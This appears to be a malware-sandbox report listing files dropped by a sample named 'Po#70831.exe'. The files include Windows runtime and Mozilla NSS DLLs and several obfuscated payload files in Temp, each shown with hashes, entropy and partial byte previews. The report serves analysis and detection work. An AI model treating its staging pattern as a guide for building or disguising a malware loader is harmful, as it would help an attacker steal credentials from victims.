                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....u'............!.....$...................@...............................P............@.............................. ...........@...............*..8=..............T............................................................................text....".......$.................. ..`.rsrc........@.......&..............@..@v....................u'.........<...d...d........u'.........d................u'.....................RSDS7.%..5..+...+.....api-ms-win-crt-multibyte-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg........ ...edata...@..`....rsrc$01....`@.......rsrc$02.....................u'.....................8...X...x...;...`.......................1...T...w...................'...L...q.......................B...e.......................7...Z...}...................+...L...m.......................

                                    C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-crt-private-l1-1-0.dll

                                    Download File
                                    Process:C:\Windows\SysWOW64\svchost.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):73016
                                    Entropy (8bit):5.838702055399663
                                    Encrypted:false
                                    SSDEEP:1536:VAHEGlVDe5c4bFE2Jy2cvxXWpD9d3334BkZnkPFZo6kt:Vc7De5c4bFE2Jy2cvxXWpD9d3334BkZj
                                    MD5:9910A1BFDC41C5B39F6AF37F0A22AACD
                                    SHA1:47FA76778556F34A5E7910C816C78835109E4050
                                    SHA-256:65DED8D2CE159B2F5569F55B2CAF0E2C90F3694BD88C89DE790A15A49D8386B9
                                    SHA-512:A9788D0F8B3F61235EF4740724B4A0D8C0D3CF51F851C367CC9779AB07F208864A7F1B4A44255E0DE8E030D84B63B1BDB58F12C8C20455FF6A55EF6207B31A91
                                    Malicious:false
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....^1...........!................................................................R.....@.............................................................8=..............T............................................................................text............................... ..`.rsrc...............................@..@v.....................^1........:...d...d.........^1........d.................^1....................RSDS.J..w/.8..bu..3.....api-ms-win-crt-private-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata......`....rsrc$01....`........rsrc$02......................^1.....>..............8...h#...5...>...?..7?.._?...?...?...?...@..V@...@...@...@..+A..\A...A...A...A...B..LB...B...B...C..HC...C...C...C...C...D..HD...D...D...E..eE...E...E...F..1F..gF...F...F...G..BG..uG...G..

                                    C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-crt-process-l1-1-0.dll

                                    Download File
                                    Process:C:\Windows\SysWOW64\svchost.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):19256
                                    Entropy (8bit):7.076072254895036
                                    Encrypted:false
                                    SSDEEP:192:aRQqjd7dWIghWG4U9kuDz7M123Ouo+Uggs/nGfe4pBjSbAURWh0txKdmVWQ4CW+6:aKcWPhWFkDz6i00GftpBjYemZlUG+zIU
                                    MD5:8D02DD4C29BD490E672D271700511371
                                    SHA1:F3035A756E2E963764912C6B432E74615AE07011
                                    SHA-256:C03124BA691B187917BA79078C66E12CBF5387A3741203070BA23980AA471E8B
                                    SHA-512:D44EF51D3AAF42681659FFFFF4DD1A1957EAF4B8AB7BB798704102555DA127B9D7228580DCED4E0FC98C5F4026B1BAB242808E72A76E09726B0AF839E384C3B0
                                    Malicious:false
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...l.h............!......................... ...............................0.......U....@.............................x............ ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v...................l.h.........:...d...d.......l.h.........d...............l.h.....................RSDSZ\.qM..I....3.....api-ms-win-crt-process-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg.......x....edata... ..`....rsrc$01....` .......rsrc$02....................l.h.............$...$...8.......X...................&...@...Y...q...........................*...E..._...z.......................!...<...V...q...........................9...V...t.......................7...R...i...

                                    C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-crt-runtime-l1-1-0.dll

                                    Download File
                                    Process:C:\Windows\SysWOW64\svchost.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):22840
                                    Entropy (8bit):6.942029615075195
                                    Encrypted:false
                                    SSDEEP:384:7b7hrKwWPhWFlsnhi00GftpBj+6em90lmTMiLzrF7:7bNrKxZnhoig6eQN7
                                    MD5:41A348F9BEDC8681FB30FA78E45EDB24
                                    SHA1:66E76C0574A549F293323DD6F863A8A5B54F3F9B
                                    SHA-256:C9BBC07A033BAB6A828ECC30648B501121586F6F53346B1CD0649D7B648EA60B
                                    SHA-512:8C2CB53CCF9719DE87EE65ED2E1947E266EC7E8343246DEF6429C6DF0DC514079F5171ACD1AA637276256C607F1063144494B992D4635B01E09DDEA6F5EEF204
                                    Malicious:false
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....L............!.........................0...............................@.......i....@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@v.....................L.........:...d...d.........L.........d.................L.....................RSDS6..>[d.=. ....C....api-ms-win-crt-runtime-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02......................L.....f.......k...k...8...............................4...S...s.......................E...g.......................)...N...n...................&...E...f...................'...D...j.......................>.......

                                    C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-crt-stdio-l1-1-0.dll

                                    Download File
                                    Process:C:\Windows\SysWOW64\svchost.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):24368
                                    Entropy (8bit):6.873960147000383
                                    Encrypted:false
                                    SSDEEP:384:GZpFVhjWPhWxEi00GftpBjmjjem3Cl1z6h1r:eCfoi0espbr
                                    MD5:FEFB98394CB9EF4368DA798DEAB00E21
                                    SHA1:316D86926B558C9F3F6133739C1A8477B9E60740
                                    SHA-256:B1E702B840AEBE2E9244CD41512D158A43E6E9516CD2015A84EB962FA3FF0DF7
                                    SHA-512:57476FE9B546E4CAFB1EF4FD1CBD757385BA2D445D1785987AFB46298ACBE4B05266A0C4325868BC4245C2F41E7E2553585BFB5C70910E687F57DAC6A8E911E8
                                    Malicious:false
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!.........................0...............................@.......)....@.............................a............0..............."..0=..............T............................................................................text...a........................... ..`.rsrc........0......................@..@v...............................8...d...d...................d.......................................RSDS...iS#.hg.....j....api-ms-win-crt-stdio-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg.......a....edata...0..`....rsrc$01....`0.......rsrc$02................^...............(....... ...................<...y...........)...h........... ...]...............H...............)...D...^...v...............................T...u.......................9...Z...{...................0...Q...

                                    C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-crt-string-l1-1-0.dll

                                    Download File
                                    Process:C:\Windows\SysWOW64\svchost.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):23488
                                    Entropy (8bit):6.840671293766487
                                    Encrypted:false
                                    SSDEEP:384:5iFMx0C5yguNvZ5VQgx3SbwA7yMVIkFGlnWPhWGTi00GftpBjslem89lgC:56S5yguNvZ5VQgx3SbwA71IkFv5oialj
                                    MD5:404604CD100A1E60DFDAF6ECF5BA14C0
                                    SHA1:58469835AB4B916927B3CABF54AEE4F380FF6748
                                    SHA-256:73CC56F20268BFB329CCD891822E2E70DD70FE21FC7101DEB3FA30C34A08450C
                                    SHA-512:DA024CCB50D4A2A5355B7712BA896DF850CEE57AA4ADA33AAD0BAE6960BCD1E5E3CEE9488371AB6E19A2073508FBB3F0B257382713A31BC0947A4BF1F7A20BE4
                                    Malicious:false
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......S...........!.........................0...............................@......B.....@..........................................0..............."...9..............T............................................................................text............................... ..`.rsrc........0......................@..@v......................S........9...d...d..........S........d..................S....................RSDSI.......$[~f..5....api-ms-win-crt-string-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.......................S....,...............8...........W...s.......................#...B...a...........................<...[...z.......................;...[...{................... ...A...b...........................<...X...r.......

                                    C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-crt-time-l1-1-0.dll

                                    Download File
                                    Process:C:\Windows\SysWOW64\svchost.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):20792
                                    Entropy (8bit):7.018061005886957
                                    Encrypted:false
                                    SSDEEP:384:8ZSWWVgWPhWFe3di00GftpBjnlfemHlUG+zITA+0:XRNoibernAA+0
                                    MD5:849F2C3EBF1FCBA33D16153692D5810F
                                    SHA1:1F8EDA52D31512EBFDD546BE60990B95C8E28BFB
                                    SHA-256:69885FD581641B4A680846F93C2DD21E5DD8E3BA37409783BC5B3160A919CB5D
                                    SHA-512:44DC4200A653363C9A1CB2BDD3DA5F371F7D1FB644D1CE2FF5FE57D939B35130AC8AE27A3F07B82B3428233F07F974628027B0E6B6F70F7B2A8D259BE95222F5
                                    Malicious:false
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....OI...........!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v....................OI........7...d...d........OI........d................OI....................RSDS...s..,E.w.9I..D....api-ms-win-crt-time-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.........OI............H...H...(...H...h... ...=...\...z.......................8...V...s.......................&...D...a...~.......................?...b.......................!...F...k.......................0...N...k...................

                                    C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-crt-utility-l1-1-0.dll

                                    Download File
                                    Process:C:\Windows\SysWOW64\svchost.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):18744
                                    Entropy (8bit):7.127951145819804
                                    Encrypted:false
                                    SSDEEP:192:QqfHQdu3WIghWG4U9lYdsNtL/123Ouo+Uggs/nGfe4pBjSb8Z9Wh0txKdmVWQ4Cg:/fBWPhWF+esnhi00GftpBjLBemHlP55q
                                    MD5:B52A0CA52C9C207874639B62B6082242
                                    SHA1:6FB845D6A82102FF74BD35F42A2844D8C450413B
                                    SHA-256:A1D1D6B0CB0A8421D7C0D1297C4C389C95514493CD0A386B49DC517AC1B9A2B0
                                    SHA-512:18834D89376D703BD461EDF7738EB723AD8D54CB92ACC9B6F10CBB55D63DB22C2A0F2F3067FE2CC6FEB775DB397030606608FF791A46BF048016A1333028D0A4
                                    Malicious:false
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....!5............!......................... ...............................0.......4....@.............................^............ ..................8=..............T............................................................................text...n........................... ..`.rsrc........ ......................@..@v....................!5.........:...d...d........!5.........d................!5.....................RSDS............k.....api-ms-win-crt-utility-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg.......^....edata... ..`....rsrc$01....` .......rsrc$02.....................!5.....d...............8.......(...................#...<...U...l...............................+...@...[...r...................................4...I..._.......................3...N...e...|.......................

                                    C:\Users\user\AppData\Local\Temp\B025A83F\freebl3.dll

                                    Download File
                                    Process:C:\Windows\SysWOW64\svchost.exe
                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):332752
                                    Entropy (8bit):6.8061257098244905
                                    Encrypted:false
                                    SSDEEP:6144:C+YBCxpjbRIDmvby5xDXlFVJM8PojGGHrIr1qqDL6XP+jW:Cu4Abg7XV72GI/qn6z
                                    MD5:343AA83574577727AABE537DCCFDEAFC
                                    SHA1:9CE3B9A182429C0DBA9821E2E72D3AB46F5D0A06
                                    SHA-256:393AE7F06FE6CD19EA6D57A93DD0ACD839EE39BA386CF1CA774C4C59A3BFEBD8
                                    SHA-512:827425D98BA491CD30929BEE6D658FCF537776CE96288180FE670FA6320C64177A7214FF4884AE3AA68E135070F28CA228AFB7F4012B724014BA7D106B5F0DCE
                                    Malicious:false
                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........./...AV..AV..AV...V..AV].@W..AV.1.V..AV].BW..AV].DW..AV].EW..AV..@W..AVO.@W..AV..@V.AVO.BW..AVO.EW..AVO.AW..AVO.V..AVO.CW..AVRich..AV........................PE..L......Z.........."!.........f...............................................p......o.....@.............................P...`........@..p....................P..........T...........................8...@...............8............................text...U........................... ..`.rdata..............................@..@.data...lH..........................@....rsrc...p....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\B025A83F\mozglue.dll

                                    Download File
                                    Process:C:\Windows\SysWOW64\svchost.exe
                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):139216
                                    Entropy (8bit):6.841477908153926
                                    Encrypted:false
                                    SSDEEP:3072:8Oqe98Ea4usvd5jm6V0InXx/CHzGYC6NccMmxK3atIYHD2JJJsPyimY4kQkE:Vqe98Evua5Sm0ux/5YC6NccMmtXHD2JR
                                    MD5:9E682F1EB98A9D41468FC3E50F907635
                                    SHA1:85E0CECA36F657DDF6547AA0744F0855A27527EE
                                    SHA-256:830533BB569594EC2F7C07896B90225006B90A9AF108F49D6FB6BEBD02428B2D
                                    SHA-512:230230722D61AC1089FABF3F2DECFA04F9296498F8E2A2A49B1527797DCA67B5A11AB8656F04087ACADF873FA8976400D57C77C404EBA4AFF89D92B9986F32ED
                                    Malicious:false
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."yQ.f.?Mf.?Mf.?Mo`.Mv.?M.z>Lb.?M...Md.?M.z<Lh.?M.z;Lm.?M.z:Lu.?MDx>Lo.?Mf.>M..?M.{1Lu.?M.{?Lg.?M.{.Mg.?M.{=Lg.?MRichf.?M................PE..L......Z.........."!.........................................................@............@.............................\...L...,.... ..p....................0......p...T...............................@...................T...@....................text............................... ..`.rdata...b.......d..................@..@.data...............................@....rsrc...p.... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\B025A83F\msvcp140.dll

                                    Download File
                                    Process:C:\Windows\SysWOW64\svchost.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):440120
                                    Entropy (8bit):6.652844702578311
                                    Encrypted:false
                                    SSDEEP:12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI
                                    MD5:109F0F02FD37C84BFC7508D4227D7ED5
                                    SHA1:EF7420141BB15AC334D3964082361A460BFDB975
                                    SHA-256:334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
                                    SHA-512:46EB62B65817365C249B48863D894B4669E20FCB3992E747CD5C9FDD57968E1B2CF7418D1C9340A89865EADDA362B8DB51947EB4427412EB83B35994F932FD39
                                    Malicious:false
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........V5=......A.....;........."...;......;......;.......;.......;......;.-....;......Rich...........PE..L....8'Y.........."!................P........ ......................................az....@A.........................C.......R..,....................x..8?......4:...f..8............................(..@............P.......@..@....................text...r........................... ..`.data....(... ......................@....idata..6....P....... ..............@..@.didat..4....p.......6..............@....rsrc................8..............@..@.reloc..4:.......<...<..............@..B........................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\B025A83F\nss3.dll

                                    Download File
                                    Process:C:\Windows\SysWOW64\svchost.exe
                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):1244112
                                    Entropy (8bit):6.809431682312062
                                    Encrypted:false
                                    SSDEEP:24576:XDI7I4/FeoJQuQ3IhXtHfjyqgJ0BnPQAib7/12bg2JSna5xfg0867U4MSpu731hn:uQ3YX5jyqgynPkbd24VwMSpu7Fhn
                                    MD5:556EA09421A0F74D31C4C0A89A70DC23
                                    SHA1:F739BA9B548EE64B13EB434A3130406D23F836E3
                                    SHA-256:F0E6210D4A0D48C7908D8D1C270449C91EB4523E312A61256833BFEAF699ABFB
                                    SHA-512:2481FC80DFFA8922569552C3C3EBAEF8D0341B80427447A14B291EC39EA62AB9C05A75E85EEF5EA7F857488CAB1463C18586F9B076E2958C5A314E459045EDE2
                                    Malicious:false
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........x..c+..c+..c+...+..c++.b*..c+lh.+..c++.`*..c++.f*..c++.g*..c+.b*..c+9.b*..c+..b+..c+9.k*..c+9.g*C.c+9.c*..c+9..+..c+9.a*..c+Rich..c+................PE..L...a..Z.........."!................T........................................@............@.............................d....<..T.......h.......................t~..0...T...............................@............................................text............................... ..`.rdata...P.......R..................@..@.data....E...`... ...:..............@....rsrc...h............Z..............@..@.reloc..t~...........^..............@..B................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\B025A83F\nssdbm3.dll

                                    Download File
                                    Process:C:\Windows\SysWOW64\svchost.exe
                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):92624
                                    Entropy (8bit):6.639368309935547
                                    Encrypted:false
                                    SSDEEP:1536:5vNGVOt0VjOJkbH8femxfRVMNKBDuOQWL1421GlkxERC+ANcFZoZ/6tNRCwI41ZH:hNGVOiBZbcGmxXMcBqmzoCUZoZebHZMw
                                    MD5:569A7A65658A46F9412BDFA04F86E2B2
                                    SHA1:44CC0038E891AE73C43B61A71A46C97F98B1030D
                                    SHA-256:541A293C450E609810279F121A5E9DFA4E924D52E8B0C6C543512B5026EFE7EC
                                    SHA-512:C027B9D06C627026774195D3EAB72BD245EBBF5521CB769A4205E989B07CB4687993A47061FF6343E6EC1C059C3EC19664B52ED3A1100E6A78CFFB1C46472AFB
                                    Malicious:false
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Z.Y.4.Y.4.Y.4.P...U.4...5.[.4..y.Q.4...7.X.4...1.S.4...0.R.4.{.5.[.4...5.Z.4.Y.5...4...0.A.4...4.X.4....X.4...6.X.4.RichY.4.........................PE..L......Z.........."!.........0...............0............................................@..........................?.......@.......`..p............L.......p.......:..T...........................(;..@............0..X............................text............................... ..`.rdata..4....0... ..................@..@.data........P.......>..............@....rsrc...p....`.......@..............@..@.reloc.......p.......D..............@..B................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\B025A83F\softokn3.dll

                                    Download File
                                    Process:C:\Windows\SysWOW64\svchost.exe
                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):144336
                                    Entropy (8bit):6.5527585854849395
                                    Encrypted:false
                                    SSDEEP:3072:zAf6suip+z7FEk/oJz69sFaXeu9CoT2nIZvetBWqIBoE9Mv:Q6PpsF4CoT2EeY2eMv
                                    MD5:67827DB2380B5848166A411BAE9F0632
                                    SHA1:F68F1096C5A3F7B90824AA0F7B9DA372228363FF
                                    SHA-256:9A7F11C212D61856DFC494DE111911B7A6D9D5E9795B0B70BBBC998896F068AE
                                    SHA-512:910E15FD39B48CD13427526FDB702135A7164E1748A7EACCD6716BCB64B978FE333AC26FA8EBA73ED33BD32F2330D5C343FCD3F0FE2FFD7DF54DB89052DB7148
                                    Malicious:false
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L......Z.........."!.........`...............................................P......+Z....@..........................................0..p....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...C.......D..................@..@.data........ ......................@....rsrc...p....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\B025A83F\ucrtbase.dll

                                    Download File
                                    Process:C:\Windows\SysWOW64\svchost.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):1142072
                                    Entropy (8bit):6.809041027525523
                                    Encrypted:false
                                    SSDEEP:24576:bZBmnrh2YVAPROs7Bt/tX+/APcmcvIZPoy4TbK:FBmF2lIeaAPgb
                                    MD5:D6326267AE77655F312D2287903DB4D3
                                    SHA1:1268BEF8E2CA6EBC5FB974FDFAFF13BE5BA7574F
                                    SHA-256:0BB8C77DE80ACF9C43DE59A8FD75E611CC3EB8200C69F11E94389E8AF2CEB7A9
                                    SHA-512:11DB71D286E9DF01CB05ACEF0E639C307EFA3FEF8442E5A762407101640AC95F20BAD58F0A21A4DF7DBCDA268F934B996D9906434BF7E575C4382281028F64D4
                                    Malicious:false
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........E..............o........p..................................................................Rich............................PE..L....3............!.....Z...........=.......p...............................p............@A........................`................................0..8=......$... ...T...........................H...@............................................text....Z.......Z.................. ..`.data........p.......^..............@....idata..6............l..............@..@.rsrc...............................@..@.reloc..$...........................@..B........................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\B025A83F\vcruntime140.dll

                                    Download File
                                    Process:C:\Windows\SysWOW64\svchost.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):83784
                                    Entropy (8bit):6.890347360270656
                                    Encrypted:false
                                    SSDEEP:1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
                                    MD5:7587BF9CB4147022CD5681B015183046
                                    SHA1:F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
                                    SHA-256:C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
                                    SHA-512:0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
                                    Malicious:false
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\Lymnaeidae

                                    Download File
                                    Process:C:\Users\user\Desktop\Po#70831.exe
                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                    Category:dropped
                                    Size (bytes):86022
                                    Entropy (8bit):4.179099660631262
                                    Encrypted:false
                                    SSDEEP:1536:94oylQ4FwIq0ZKjsK3LwpimRI/6aF3zIBGSl6hSrYTT:yblDZKMxe3zWRUTT
                                    MD5:5380D8BE20B71856CE5FC8F9C964C5AA
                                    SHA1:5C60D69C51C41ABFC2F1DE1F68BFC2B23BB06C3F
                                    SHA-256:E18861A7DDE9E66445B03B659C3B74F22EA9EDB49F2BCFF1235733C587F7B97B
                                    SHA-512:94786FB3F5BF22270C1D78969CCD2E2675C246D24043A69143BEC93632ACE60B5FBC81A409DB952339AC5997FFE9295EC1E51E2BD05F377CAB203DC3D6365F21
                                    Malicious:false
                                    Preview:30Q78W35B35D38H62D65M63K38L31R65N63Z63F63K30R32K30C30G30B30Z35N36C35M37T62C38P36Q62F30X30R30K30O30K30Q36D36D38S39T34E35T38L34K62N39E36M35S30N30Q30A30A30L30T36I36H38S39X34N64H38L36W62I61X37S32B30Q30T30X30F30W30V36N36A38F39E35V35O38V38O62J38V36R65M30B30P30N30N30Z30U36T36H38A39Y34N35R38F61F62E39A36Y35M30Z30L30I30R30A30L36B36P38Z39O34E64L38K63W62W61D36F63M30D30H30S30H30G30O36X36J38I39J35H35K38K65W62M38H33I33A30A30J30J30L30Y30K36G36W38D39P34Q35W39G30F62I39G33E32C30U30W30I30T30O30L36F36N38R39I34J64I39Q32X62W61V32U65W30W30V30R30P30R30R36B36P38C39Y35Y35B39V34N62B38H36I34O30A30I30C30Y30J30E36T36M38F39K34K35A39H36L62T39P36A63I30J30J30X30V30M30W36Z36I38F39B34X64N39P38L62Q61E36J63Q30S30H30D30Z30D30O36M36T38G39N35A35A39T61Q33I33J63M30B36L36Z38P39F34Z35J39Z63I62X39P36F65O30A30P30H30I30K30B36M36Q38K39M38N64P34U34E66D66H66O66K66Z66I62I61M37M34A30D30U30J30S30P30B36A36I38X39V39R35L34D36R66K66S66J66P66Q66G62W38B36Y34T30S30G30V30L30U30O36H36K38X39I38R35O34W38H66D66B66N66Q66H66J62I39L36E63V30G30O30V30N30S3

                                    C:\Users\user\AppData\Local\Temp\Okeghem

                                    Download File
                                    Process:C:\Users\user\Desktop\Po#70831.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):114688
                                    Entropy (8bit):7.643201689689432
                                    Encrypted:false
                                    SSDEEP:1536:c4TUGbZmzW8TnsT8uxX3tEeD5vuG0FUE1L1FGaSiOqt6RB+EYr:9TSzWDYuxKII3FTdDeqSo
                                    MD5:4C10F389BDB464086ADB1CAFB58E6C70
                                    SHA1:0A9BB2CD4A8845342BFC4B183D55902583779E85
                                    SHA-256:CBF01701C1AA17A9A7E256A9B5880377C2FCC2D18B17BA3F1E2B65F4D714A67A
                                    SHA-512:2F36DC0437941C65C588548D4A701DDC4F79FBFD6BD713AAC4167C8B4713E239D0EF77E60CC1FC0198C2E3D5EBBD59A95F1C2CEA3FD8E8DB5F58D6E462756991
                                    Malicious:false
                                    Preview:.h.SIX34\1US.F4.82G3BYZ.2(LSKX34X1ZS7UF4T82G3BYZV22LSKX34X1ZR7U.$T6-.:.x.W~.m...[]+.*!X24U9._2@6y83.@9=k-]P=Cz.^;u.Y2.p3BYZV22LSKX34X1ZS7UF4T82G3BYZV22LSKX34X1ZS7UF4T82G3BYZV22LSKX34X1ZS7UF4T82G3BYZV22LSKX34X1ZS7UF4T82G3BYZV22LSKX34X1ZS7UF4T82G3BYZV22LSKXcqX1.R2U_j..2G3BYZV2.L..S26A1.R7Ub4T82G3..[V2"LSK.24X1.S7EF4T:2G7BYZV22LWKX34X1ZS7WF4P82G3BYXV22LS[X3tX1ZS'UF$T82G3BIZV22LSKX34X1.R7.A4T82G3BYZV22LSKX34X1ZS7UF4T.3GoQYZV22LSKX34X1ZS7UF4T82G3BYZV22LSKX34X1ZS7UF4T82G3BYZV22LSKX34X1ZS7UF4T82G3BYZV22LS..wqX1ZS..G4T(2G3.XZV62LSKX34X1ZS7UF.T8R.r..ZV22 UKX3.Y1Z[7UF.U82G3BYZV22LSK.34.s..7UF4T.:G3B.[V22LSK.24X1ZS7UF4T82G3BY.x[V-'*X3._1ZS.TF4\82G.CYZV22LSKX34X1.S7.hF1T]$3B.IV22.RKX'4X1.R7UF4T82G3BYZVr2L.KX34X1ZS7UF4T82G3BYZV22LSKX34X1ZS7UF4T82G3BYZV22LSKX3$Z1ZS7UF.U82G3BYZV22LSK.34.1ZS7UF4T82G3BYZV22LSKX34X1ZS7UF4T82G3BYZV22LSKX34X1ZS7UF4T82G3BYZV22LSKX34X1ZS7UF4T82G3BYZV22LSKX34X1ZS7UF4T82G3BYZV22LSKX34X1ZS7UF4T82G3BYZV22LSKX34X1ZS7UF4T82G3BYZV22LSKX34X1ZS7UF4T82G3BYZV22LSKX34X1ZS7UF4T82G3BYZV

                                    C:\Users\user\AppData\Local\Temp\aut2BB3.tmp

                                    Download File
                                    Process:C:\Users\user\Desktop\Po#70831.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):96182
                                    Entropy (8bit):7.978879202580846
                                    Encrypted:false
                                    SSDEEP:1536:J6TSGTkzExXSOggs7H5G2Covo3djUHI+hMqMaDUSb5gt122Migx03+r5y45o:J6+7zExXSOggs7ZpHiYBh5USFgD2r1yX
                                    MD5:75C296EF2A10B39F5BA58FF792FBC4CB
                                    SHA1:2D60C84530717D9C323F1A000C034614628C0DF5
                                    SHA-256:234B337794DCAECC05629983EF77E1FE408E0E446B79ECECA8C2614A894D9C92
                                    SHA-512:1ECFBCB5145A2749BA7224DB10F84A0CBC9CC4A117420FF15B66B707515E49537C3B4F1578366AF536E793279751CD7715BC873AD1FB92BFFA6114821EDE3650
                                    Malicious:false
